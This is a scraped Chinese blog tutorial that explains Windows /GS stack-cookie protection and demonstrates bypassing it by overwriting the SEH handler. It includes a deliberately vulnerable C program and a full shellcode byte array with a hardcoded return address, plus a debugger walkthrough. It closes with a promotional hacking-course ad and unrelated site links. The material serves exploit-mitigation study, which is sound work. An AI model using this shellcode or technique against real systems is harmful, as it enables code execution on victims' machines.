当前位置: 首页 > news >正文

seo网站基础建设移动应用软件开发

seo网站基础建设,移动应用软件开发,新网站制作公司,深圳网站制作电话前言 本次文章只用于技术讨论#xff0c;学习#xff0c;切勿用于非法用途#xff0c;用于非法用途与本人无关#xff01; 所有环境均为本地环境分析#xff0c;且在本机进行学习。 GS机制并没有对SEH提供保护#xff0c;换句话说我们可以通过攻击程序的异常处理达到绕…前言 本次文章只用于技术讨论学习切勿用于非法用途用于非法用途与本人无关 所有环境均为本地环境分析且在本机进行学习。 GS机制并没有对SEH提供保护换句话说我们可以通过攻击程序的异常处理达到绕过GS的目的。我们首先通过超长字符串覆盖掉异常处理函数指针然后想办法触发一个异常程序就会转入异常处理由于异常处理函数指针已经被我们覆盖那么我们就可以通过劫持SEH来控制程序的后续流程。作者rkabyss 一、 GS提供的保护作用 修改栈帧中函数返回地址的经典攻击将被 GS 机制有效遏制 基于改写函数指针的攻击如对 C虚函数的攻击GS 机制仍然很难防御 针对异常处理机制的攻击GS 很难防御 GS 是对栈帧的保护机制因此很难防御堆溢出的攻击。 二、GS原理 Security Cookie是由.data段中第一个DWORD进行异或在程序运行时.data段第一个DWORD一般是随机的很难去预测它所以把他当成安全cookie去使用。 Security Cookie一般在进入到函数中后会放在下图当中位置如果要淹没返回地址一定会先淹没到Security Cookie在执行到ret返回时程序会调用一个叫做check函数去检查有没有出现问题Security Cookie在生成时会在栈里和.data段中各存放一个安全cookie在执行ret时check会对栈中和.data段中cookie进行比较如果不一样就判断程序被破坏说明栈发生了溢出。 为了增加Security Cookie随机性会用.data段第一个DWORD与栈中EBP进行异或操作当ret时调用check函数再将其异或回去。 在Security Cookie代码中写了如过没有超过四字节是不会启动安全cookie的如果要启动只能通过#pragma strict_gs_check(on)使其强制开启。其实这也是绕过的一种方法。 #include stdio.h #include string.h #include stdlib.h #pragma strict_gs_check(on)int vulfuntion(char* str) {char arry[4];strcpy(arry, str);return 1; }int main() {char* str 123123123123123123123123123;vultest(str);return 0; }因为他是带有符号的直接跳转到main就可以找到主函数。 看到Security Cookie生成的安全cookie放到了EAX寄存器中为了增加安全cookie随机性安全cookie又与EBP进行异或。 跳转到EBP可以看到00F3F92C为EBP下边009AD71E为返回地址。 将安全cookie放入到了EAX寄存器中。 安全cookie与EBP异或完将其放入到EBP-4位置在堆栈中可以看到。 通过上边代码可以看到copy的字符串远大于要传输的空间所以造成了栈溢出已将安全cookie、EBP、返回地址全部淹没。如果正常情况下已经可以进行利用而有了安全cookie之后在下方使用check函数进行了判断判断异常直接飞掉。 在调用到check函数之前将安全cookie保存到了ECX中前面为了增加随机性进行了异或现在将其进行了恢复。 三、SEH异常突破GS 函数test中存在典型的栈溢出漏洞。在strcpy操作后变量buf会被溢出当字符串足够长的时候程序的SEH异常处理句柄也会被淹没。由于strcpy的溢出覆盖了input的地址会造成strcat从一个非法地址读取数据这时会触发异常程序转入异常处理这样就可以在程序检查Security Cookie前将程序流程劫持。 #include stdafx.h #include string.h char shellcode[] \xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C \x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53 \x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B \x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95 \xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59 \x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A \xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75 \xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03 \x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB \x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50 \x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90 \xA0\xFE\x12\x00//address of shellcode ;void test(char * input) {char buf[200];strcpy(buf,input);strcat(buf,input); }void main() {test(shellcode); }根据release中32程序规则主函数有三个参数判断下方call为主函数。 进入到主函数看到call其实就是test函数直接进入到test函数当中去。 可以看到整体逻辑如前面原理讲的一样首先获取到安全cookie保存到EAX当中并与EBP进行异或在结束时候又将其进行恢复。 执行到strcpy函数位置观察栈空间EBP-4位置为安全cookieEBP4为返回地址EBP8是参数。后面ESP44为SE处理程序。 执行完strcpy函数观察栈空间发现SE处理程序地址已经被覆盖为shellcode起始地址。 执行到strcat函数观察到EBP8位置已经被覆盖EBP8是源字符串覆盖之后是一个不可访问地址。执行strcat函数会直接进行异常处理因为源字符串为不可访问地址而异常处理地址为shellcode起始地址。 触发异常处理进入到shellcode当中接下来会运行shellcode代码。 五、总结 现在很多程序都带有GS在分析程序的时候发现了缺陷却因为保护利用不了先掌握一些突破GS方法在之后遇到时能将其运用到之后会对其他一些突破方法进行复现。 最后 分享一个快速学习【网络安全】的方法「也许是」最全面的学习方法 1、网络安全理论知识2天 ①了解行业相关背景前景确定发展方向。 ②学习网络安全相关法律法规。 ③网络安全运营的概念。 ④等保简介、等保规定、流程和规范。非常重要 2、渗透测试基础一周 ①渗透测试的流程、分类、标准 ②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking ③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察 ④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等 3、操作系统基础一周 ①Windows系统常见功能和命令 ②Kali Linux系统常见功能和命令 ③操作系统安全系统入侵排查/系统加固基础 4、计算机网络基础一周 ①计算机网络基础、协议和架构 ②网络通信原理、OSI模型、数据转发流程 ③常见协议解析HTTP、TCP/IP、ARP等 ④网络攻击技术与网络安全防御技术 ⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现 5、数据库基础操作2天 ①数据库基础 ②SQL语言基础 ③数据库安全加固 6、Web渗透1周 ①HTML、CSS和JavaScript简介 ②OWASP Top10 ③Web漏洞扫描工具 ④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等 恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k。 到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗 想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取 扫下方二维码免费领取 有了这些基础如果你要深入学习可以参考下方这个超详细学习路线图按照这个路线学习完全够支撑你成为一名优秀的中高级网络安全工程师 高清学习路线图或XMIND文件点击下载原文件 还有一些学习中收集的视频、文档资源有需要的可以自取 每个成长路线对应板块的配套视频 当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。 因篇幅有限仅展示部分资料需要的可以【扫下方二维码免费领取】
http://www.yayakq.cn/news/3107/

相关文章:

  • 优化网站推广排名百度一下百度搜索
  • 西安哪里做网站长沙的网站建设公司哪家好
  • 关于电子商务网站建设的论文电子商务网站建设的一般过程
  • 什么是空壳网站刷题网站建设
  • php网站后台验证码不显示设计机构网站
  • 做竞猜网站犯法吗php网站整合discuz
  • 杭州市规划建设网站亚马逊雨林探险之旅作文
  • 查房价的官方网站WordPress多站点恢复
  • 建设跨境电商网站设计社交网站
  • 装饰网站建设的方案行业门户网站建设方案
  • 莆田网站建设费用广东东莞出行最新政策
  • 什么是网站流量优化搜索优化整站优化
  • 外贸营销型网站策划中seo层面包括杭州网站关键词推广
  • dedecms做门户网站wordpress空间免费
  • 团队网站怎么做广州市网站建设公
  • 公司门户网站建设方案建设企业网站官网下载中心
  • 平乡县网站建设平台位置游戏网站建设方案
  • 四川住房城乡建设厅官网优化网站平台
  • 丹徒网站建设哪家好眼镜企业网站建设方案
  • 福田深圳网站建设资料库网站开发报价
  • 聊城企业网站建设费用韩国风格网站php源码
  • 建筑公司网站源码 开源 免费遵义公司网站制作哪家好
  • 气动喷枪网站建设html5 metro风格网站模板
  • 网站备案邮寄资料嵌入式开发要学哪些
  • 做餐饮如何加入外卖网站怎样给建设的网站提意见
  • 生物科技 网站模板婚庆网站建设目的
  • 网站详情页用cdr做可以吗网页制作公司挣钱吗
  • 免费自助建站排名wordpress 4.9 站群
  • 出版社网站建设网站的网络推广
  • 司瓦图网站编写app